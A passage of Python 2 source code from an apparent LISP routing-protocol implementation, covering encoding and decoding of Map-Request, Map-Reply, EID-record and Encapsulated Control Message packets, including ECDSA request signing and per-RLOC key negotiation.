itr_str = red(itr.print_address_no_iid(), False)
lprint(" itr-rloc: afi {} {}{}".format(itr.afi, itr_str,
"" if (keys == None) else ", " + keys[1].print_keys()))
keys = None
#endfor
if (self.json_telemetry != None):
lprint(" itr-rloc: afi {} telemetry: {}".format(LISP_AFI_LCAF,
self.json_telemetry))
#endif
#enddef
def sign_map_request(self, privkey):
sig_eid = self.signature_eid.print_address()
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
self.map_request_signature = privkey.sign(sig_data)
sig = binascii.b2a_base64(self.map_request_signature)
sig = { "source-eid" : source_eid, "signature-eid" : sig_eid,
"signature" : sig }
return(json.dumps(sig))
#enddef
def verify_map_request_sig(self, pubkey):
sseid = green(self.signature_eid.print_address(), False)
if (pubkey == None):
lprint("Public-key not found for signature-EID {}".format(sseid))
return(False)
#endif
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
pubkey = binascii.a2b_base64(pubkey)
good = True
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
lprint("Invalid public-key in mapping system for sig-eid {}". \
format(self.signature_eid.print_address_no_iid()))
good = False
#endtry
if (good):
try:
good = key.verify(self.map_request_signature, sig_data)
except:
good = False
#endtry
#endif
passfail = bold("passed" if good else "failed", False)
lprint("Signature verification {} for EID {}".format(passfail, sseid))
return(good)
#enddef
def encode_json(self, json_string):
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
lcaf_len = socket.htons(len(json_string) + 2)
json_len = socket.htons(len(json_string))
packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0, lcaf_len,
json_len)
packet += json_string
packet += struct.pack("H", 0)
return(packet)
#enddef
def encode(self, probe_dest, probe_port):
first_long = (LISP_MAP_REQUEST << 28) | self.record_count
telemetry = lisp_telemetry_configured() if (self.rloc_probe) else None
if (telemetry != None): self.itr_rloc_count += 1
first_long = first_long | (self.itr_rloc_count << 8)
if (self.auth_bit): first_long |= 0x08000000
if (self.map_data_present): first_long |= 0x04000000
if (self.rloc_probe): first_long |= 0x02000000
if (self.smr_bit): first_long |= 0x01000000
if (self.pitr_bit): first_long |= 0x00800000
if (self.smr_invoked_bit): first_long |= 0x00400000
if (self.mobile_node): first_long |= 0x00200000
if (self.xtr_id_present): first_long |= 0x00100000
if (self.local_xtr): first_long |= 0x00004000
if (self.dont_reply_bit): first_long |= 0x00002000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
#
# Check if Map-Request is going to be signed. If so, encode json-string
# in source-EID field. Otherwise, just encode source-EID with instance-
# id in source-EID field.
#
encode_sig = False
filename = self.privkey_filename
if (filename != None and os.path.exists(filename)):
f = open(filename, "r"); key = f.read(); f.close()
try:
key = ecdsa.SigningKey.from_pem(key)
except:
return(None)
#endtry
json_string = self.sign_map_request(key)
encode_sig = True
elif (self.map_request_signature != None):
sig = binascii.b2a_base64(self.map_request_signature)
json_string = { "source-eid" : self.source_eid.print_address(),
"signature-eid" : self.signature_eid.print_address(),
"signature" : sig }
json_string = json.dumps(json_string)
encode_sig = True
#endif
if (encode_sig):
packet += self.encode_json(json_string)
else:
if (self.source_eid.instance_id != 0):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.source_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.source_eid.afi))
packet += self.source_eid.pack_address()
#endif
#endif
#
# For RLOC-probes, see if keys already negotiated for RLOC. If so,
# use them so a new DH exchange does not happen.
#
if (probe_dest):
if (probe_port == 0): probe_port = LISP_DATA_PORT
addr_str = probe_dest.print_address_no_iid() + ":" + \
str(probe_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]
#endif
#endif
#
# If security is enabled, put security parameters in the first
# ITR-RLOC.
#
for itr in self.itr_rlocs:
if (lisp_data_plane_security and self.itr_rlocs.index(itr) == 0):
if (self.keys == None or self.keys[1] == None):
keys = lisp_keys(1)
self.keys = [None, keys, None, None]
#endif
keys = self.keys[1]
keys.add_key_by_nonce(self.nonce)
packet += keys.encode_lcaf(itr)
else:
packet += struct.pack("H", socket.htons(itr.afi))
packet += itr.pack_address()
#endif
#endfor
#
# Add telemetry, if configured and this is an RLOC-probe Map-Request.
#
if (telemetry != None):
ts = str(time.time())
telemetry = lisp_encode_telemetry(telemetry, io=ts)
self.json_telemetry = telemetry
packet += self.encode_json(telemetry)
#endif
mask_len = 0 if self.target_eid.is_binary() == False else \
self.target_eid.mask_len
subscribe = 0
if (self.subscribe_bit):
subscribe = 0x80
self.xtr_id_present = True
if (self.xtr_id == None):
self.xtr_id = random.randint(0, (2**128)-1)
#endif
#endif
packet_format = "BB"
packet += struct.pack(packet_format, subscribe, mask_len)
if (self.target_group.is_null() == False):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_sg(self.target_group)
elif (self.target_eid.instance_id != 0 or
self.target_eid.is_geo_prefix()):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.target_eid.afi))
packet += self.target_eid.pack_address()
#endif
#
# If this is a subscription request, append xTR-ID to end of packet.
#
if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
return(packet)
#enddef
def lcaf_decode_json(self, packet):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)
#
# Do lcaf-length and json-length checks first.
#
lcaf_len = socket.ntohs(lcaf_len)
json_len = socket.ntohs(json_len)
packet = packet[format_size::]
if (len(packet) < lcaf_len): return(None)
if (lcaf_len != json_len + 2): return(None)
#
# Pull out JSON string from packet.
#
json_string = packet[0:json_len]
packet = packet[json_len::]
#
# If telemetry data in the JSON, do not need to convert to dict array.
#
if (lisp_is_json_telemetry(json_string) != None):
self.json_telemetry = json_string
#endif
#
# Get JSON encoded afi-address in JSON, we are expecting AFI of 0.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0): return(packet)
if (self.json_telemetry != None): return(packet)
#
# Convert string to dictionary array.
#
try:
json_string = json.loads(json_string)
except:
return(None)
#endtry
#
# Store JSON data internally.
#
if (json_string.has_key("source-eid") == False): return(packet)
eid = json_string["source-eid"]
afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
eid.count(":") == 7 else None
if (afi == None):
lprint("Bad JSON 'source-eid' value: {}".format(eid))
return(None)
#endif
self.source_eid.afi = afi
self.source_eid.store_address(eid)
if (json_string.has_key("signature-eid") == False): return(packet)
eid = json_string["signature-eid"]
if (eid.count(":") != 7):
lprint("Bad JSON 'signature-eid' value: {}".format(eid))
return(None)
#endif
self.signature_eid.afi = LISP_AFI_IPV6
self.signature_eid.store_address(eid)
if (json_string.has_key("signature") == False): return(packet)
sig = binascii.a2b_base64(json_string["signature"])
self.map_request_signature = sig
return(packet)
#enddef
def decode(self, packet, source, port):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.auth_bit = True if (first_long & 0x08000000) else False
self.map_data_present = True if (first_long & 0x04000000) else False
self.rloc_probe = True if (first_long & 0x02000000) else False
self.smr_bit = True if (first_long & 0x01000000) else False
self.pitr_bit = True if (first_long & 0x00800000) else False
self.smr_invoked_bit = True if (first_long & 0x00400000) else False
self.mobile_node = True if (first_long & 0x00200000) else False
self.xtr_id_present = True if (first_long & 0x00100000) else False
self.local_xtr = True if (first_long & 0x00004000) else False
self.dont_reply_bit = True if (first_long & 0x00002000) else False
self.itr_rloc_count = ((first_long >> 8) & 0x1f)
self.record_count = first_long & 0xff
self.nonce = nonce[0]
#
# Decode xTR-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(packet) == False): return(None)
#endif
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])
self.source_eid.afi = socket.ntohs(afi[0])
packet = packet[format_size::]
if (self.source_eid.afi == LISP_AFI_LCAF):
save_packet = packet
packet = self.source_eid.lcaf_decode_iid(packet)
if (packet == None):
packet = self.lcaf_decode_json(save_packet)
if (packet == None): return(None)
#endif
elif (self.source_eid.afi != LISP_AFI_NONE):
packet = self.source_eid.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source_eid.mask_len = self.source_eid.host_mask_len()
no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
self.itr_rlocs = []
itr_rloc_count = self.itr_rloc_count + 1
while (itr_rloc_count != 0):
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = socket.ntohs(struct.unpack("H", packet[:format_size])[0])
itr = lisp_address(LISP_AFI_NONE, "", 32, 0)
itr.afi = afi
#
# We may have telemetry in the ITR-RLOCs. Check here to avoid
# security key material logic.
#
if (itr.afi == LISP_AFI_LCAF):
orig_packet = packet
json_packet = packet[format_size::]
packet = self.lcaf_decode_json(json_packet)
if (packet == json_packet): packet = orig_packet
#endif
#
# If Security Type LCAF, get security parameters and store in
# lisp_keys().
#
if (itr.afi != LISP_AFI_LCAF):
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
#
# Decide if we should remove security key state if ITR decided
# to stop doing key exchange when it previously had.
#
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
rloc_keys = lisp_crypto_keys_by_rloc_decap
if (rloc_keys.has_key(addr_str)): rloc_keys.pop(addr_str)
#
# If "ipc-data-plane = yes" is configured, we need to tell the
# data-plane from the lisp-etr process there is no longer a
# decryption key.
#
lisp_write_ipc_decap_key(addr_str, None)
elif (self.json_telemetry == None):
#
# Decode key material if we found no telemetry data.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC or
decode_key.cipher_suite == LISP_CS_25519_GCM):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_curve=False,
do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr.afi = socket.ntohs(afi)
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
stored_key = None
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_decap[addr_str]
stored_key = keys[1] if keys and keys[1] else None
#endif
new = True
if (stored_key):
if (stored_key.compare_keys(key)):
self.keys = [None, stored_key, None, None]
lprint("Maintain stored decap-keys for RLOC {}". \
format(red(addr_str, False)))
else:
new = False
remote = bold("Remote decap-rekeying", False)
lprint("{} for RLOC {}".format(remote, red(addr_str,
False)))
key.copy_keypair(stored_key)
key.uptime = stored_key.uptime
stored_key = None
#endif
#endif
if (stored_key == None):
self.keys = [None, key, None, None]
if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
key.local_public_key = None
lprint("{} for {}".format(bold("Ignoring decap-keys",
False), red(addr_str, False)))
elif (key.remote_public_key != None):
if (new):
lprint("{} for RLOC {}".format( \
bold("New decap-keying", False),
red(addr_str, False)))
#endif
key.compute_shared_key("decap")
key.add_key_by_rloc(addr_str, False)
#endif
#endif
#endif
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
#endwhile
format_size = struct.calcsize("BBH")
if (len(packet) < format_size): return(None)
subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
self.subscribe_bit = (subscribe & 0x80)
self.target_eid.afi = socket.ntohs(afi)
packet = packet[format_size::]
self.target_eid.mask_len = mask_len
if (self.target_eid.afi == LISP_AFI_LCAF):
packet, target_group = self.target_eid.lcaf_decode_eid(packet)
if (packet == None): return(None)
if (target_group): self.target_group = target_group
else:
packet = self.target_eid.unpack_address(packet)
if (packet == None): return(None)
packet = packet[format_size::]
#endif
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.target_eid, self.target_group))
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQ")
if (len(packet) < format_size): return(None)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower = struct.unpack("QQ", packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
return(True)
#enddef
#endclass
#
# Map-Reply Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=2 |P|E|S| Reserved | Hop Count | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R |N|Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_reply():
def __init__(self):
self.rloc_probe = False
self.echo_nonce_capable = False
self.security = False
self.record_count = 0
self.hop_count = 0
self.nonce = 0
self.keys = None
#enddef
def print_map_reply(self):
line = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + \
"nonce: 0x{}"
lprint(line.format(bold("Map-Reply", False), \
"R" if self.rloc_probe else "r",
"E" if self.echo_nonce_capable else "e",
"S" if self.security else "s", self.hop_count, self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REPLY << 28) | self.record_count
first_long |= self.hop_count << 8
if (self.rloc_probe): first_long |= 0x08000000
if (self.echo_nonce_capable): first_long |= 0x04000000
if (self.security): first_long |= 0x02000000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.rloc_probe = True if (first_long & 0x08000000) else False
self.echo_nonce_capable = True if (first_long & 0x04000000) else False
self.security = True if (first_long & 0x02000000) else False
self.hop_count = (first_long >> 8) & 0xff
self.record_count = first_long & 0xff
self.nonce = nonce[0]
if (lisp_crypto_keys_by_nonce.has_key(self.nonce)):
self.keys = lisp_crypto_keys_by_nonce[self.nonce]
self.keys[1].delete_key_by_nonce(self.nonce)
#endif
return(packet)
#enddef
#endclass
#
# This is the structure of an EID record in a Map-Request, Map-Reply, and
# Map-Register.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Locator Count | EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd | Map-Version Number | EID-Prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-Prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When E is set, the entire locator-set records are encrypted with the chacha
# cipher.
#
# And this for a EID-record in a Map-Referral.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Referral Count| EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |SigCnt | Map Version Number | EID-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_eid_record():
def __init__(self):
self.record_ttl = 0
self.rloc_count = 0
self.action = 0
self.authoritative = False
self.ddt_incomplete = False
self.signature_count = 0
self.map_version = 0
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.record_ttl = 0
#enddef
def print_prefix(self):
if (self.group.is_null()):
return(green(self.eid.print_prefix(), False))
#endif
return(green(self.eid.print_sg(self.group), False))
#enddef
def print_ttl(self):
ttl = self.record_ttl
if (self.record_ttl & 0x80000000):
ttl = str(self.record_ttl & 0x7fffffff) + " secs"
elif ((ttl % 60) == 0):
ttl = str(ttl/60) + " hours"
else:
ttl = str(ttl) + " mins"
#endif
return(ttl)
#enddef
def store_ttl(self):
ttl = self.record_ttl * 60
if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
return(ttl)
#enddef
def print_record(self, indent, ddt):
incomplete = ""
sig_count = ""
action_str = bold("invalid-action", False)
if (ddt):
if (self.action < len(lisp_map_referral_action_string)):
action_str = lisp_map_referral_action_string[self.action]
action_str = bold(action_str, False)
incomplete = (", " + bold("ddt-incomplete", False)) if \
self.ddt_incomplete else ""
sig_count = (", sig-count: " + str(self.signature_count)) if \
(self.signature_count != 0) else ""
#endif
else:
if (self.action < len(lisp_map_reply_action_string)):
action_str = lisp_map_reply_action_string[self.action]
if (self.action != LISP_NO_ACTION):
action_str = bold(action_str, False)
#endif
#endif
#endif
afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")
lprint(line.format(indent, self.print_ttl(), self.rloc_count,
action_str, "auth" if (self.authoritative is True) else "non-auth",
incomplete, sig_count, self.map_version, afi,
green(self.print_prefix(), False)))
#enddef
def encode(self):
action = self.action << 13
if (self.authoritative): action |= 0x1000
if (self.ddt_incomplete): action |= 0x800
#
# Decide on AFI value.
#
afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
if (afi < 0): afi = LISP_AFI_LCAF
sg = (self.group.is_null() == False)
if (sg): afi = LISP_AFI_LCAF
sig_mv = (self.signature_count << 12) | self.map_version
mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len
packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
self.rloc_count, mask_len, socket.htons(action),
socket.htons(sig_mv), socket.htons(afi))
#
# Check if we are encoding an (S,G) entry.
#
if (sg):
packet += self.eid.lcaf_encode_sg(self.group)
return(packet)
#endif
#
# Check if we are encoding an geo-prefix in an EID-record.
#
if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
packet = packet[0:-2]
packet += self.eid.address.encode_geo()
return(packet)
#endif
#
# Check if instance-ID needs to be encoded in the EID record.
#
if (afi == LISP_AFI_LCAF):
packet += self.eid.lcaf_encode_iid()
return(packet)
#endif
#
# Just encode the AFI for the EID.
#
packet += self.eid.pack_address()
return(packet)
#enddef
def decode(self, packet):
packet_format = "IBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.record_ttl, self.rloc_count, self.eid.mask_len, action, \
self.map_version, self.eid.afi = \
struct.unpack(packet_format, packet[:format_size])
self.record_ttl = socket.ntohl(self.record_ttl)
action = socket.ntohs(action)
self.action = (action >> 13) & 0x7
self.authoritative = True if ((action >> 12) & 1) else False
self.ddt_incomplete = True if ((action >> 11) & 1) else False
self.map_version = socket.ntohs(self.map_version)
self.signature_count = self.map_version >> 12
self.map_version = self.map_version & 0xfff
self.eid.afi = socket.ntohs(self.eid.afi)
self.eid.instance_id = 0
packet = packet[format_size::]
#
# Check if instance-ID LCAF is encoded in the EID-record.
#
if (self.eid.afi == LISP_AFI_LCAF):
packet, group = self.eid.lcaf_decode_eid(packet)
if (group): self.group = group
self.group.instance_id = self.eid.instance_id
return(packet)
#endif
packet = self.eid.unpack_address(packet)
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# Encapsualted Control Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# OH | (uses RLOC addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4342 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LH |Type=8 |S|D|E|M| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# IH | (uses RLOC or EID addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = yyyy |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LCM | LISP Control Message |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
class lisp_ecm():
def __init__(self, sport):
self.security = False
self.ddt = False
self.to_etr = False
self.to_ms = False
self.length = 0
self.ttl = LISP_DEFAULT_ECM_TTL
self.protocol = LISP_UDP_PROTOCOL
self.ip_checksum = 0
self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.udp_sport = sport
self.udp_dport = LISP_CTRL_PORT
self.udp_checksum = 0
self.udp_length = 0
self.afi = LISP_AFI_NONE
#enddef
def print_ecm(self):
line = ("{} -> flags: {}{}{}{}, " + \
"inner IP: {} -> {}, inner UDP: {} -> {}")
lprint(line.format(bold("ECM", False), "S" if self.security else "s",
"D" if self.ddt else "d", "E" if self.to_etr else "e",
"M" if self.to_ms else "m",
green(self.source.print_address(), False),
green(self.dest.print_address(), False), self.udp_sport,
self.udp_dport))
def encode(self, packet, inner_source, inner_dest):
self.udp_length = len(packet) + 8
self.source = inner_source
self.dest = inner_dest
if (inner_dest.is_ipv4()):
self.afi = LISP_AFI_IPV4
self.length = self.udp_length + 20
#endif
if (inner_dest.is_ipv6()):
self.afi = LISP_AFI_IPV6
self.length = self.udp_length
#endif
#
# Encode ECM header first, then the IPv4 or IPv6 header, then the
# UDP header.
#
first_long = (LISP_ECM << 28)
if (self.security): first_long |= 0x08000000
if (self.ddt): first_long |= 0x04000000
if (self.to_etr): first_long |= 0x02000000
if (self.to_ms): first_long |= 0x01000000
ecm = struct.pack("I", socket.htonl(first_long))
ip = ""
if (self.afi == LISP_AFI_IPV4):
ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
ip += self.source.pack_address()
ip += self.dest.pack_address()
ip = lisp_ip_checksum(ip)
#endif
if (self.afi == LISP_AFI_IPV6):
ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
self.protocol, self.ttl)
ip += self.source.pack_address()
ip += self.dest.pack_address()
#endif
s = socket.htons(self.udp_sport)
d = socket.htons(self.udp_dport)
l = socket.htons(self.udp_length)
c = socket.htons(self.udp_checksum)
udp = struct.pack("HHHH", s, d, l, c)
return(ecm + ip + udp)
#enddef
def decode(self, packet):
#
# Decode ECM header.
#
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.security = True if (first_long & 0x08000000) else False
self.ddt = True if (first_long & 0x04000000) else False
self.to_etr = True if (first_long & 0x02000000) else False
self.to_ms = True if (first_long & 0x01000000) else False
packet = packet[format_size::]
#
# Decode inner IPv4/IPv6 and UDP header.
#
if (len(packet) < 1): return(None)
version = struct.unpack("B", packet[0:1])[0]
version = version >> 4
if (version == 4):
format_size = struct.calcsize("HHIBBH")
if (len(packet) < format_size): return(None)
x, l, x, t, p, c = struct.unpack("HHIBBH", packet[:format_size])
self.length = socket.ntohs(l)
self.ttl = t
self.protocol = p
self.ip_checksum = socket.ntohs(c)
self.source.afi = self.dest.afi = LISP_AFI_IPV4
#
# Zero out IPv4 header checksum.
#
p = struct.pack("H", 0)
offset1 = struct.calcsize("HHIBB")
offset2 = struct.calcsize("H")
packet = packet[:offset1] + p + packet[offset1+offset2:]
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
if (version == 6):
format_size = struct.calcsize("IHBB")
if (len(packet) < format_size): return(None)
x, l, p, t = struct.unpack("IHBB", packet[:format_size])
self.length = socket.ntohs(l)
self.protocol = p
self.ttl = t
self.source.afi = self.dest.afi = LISP_AFI_IPV6
packet = packet[format_size::]
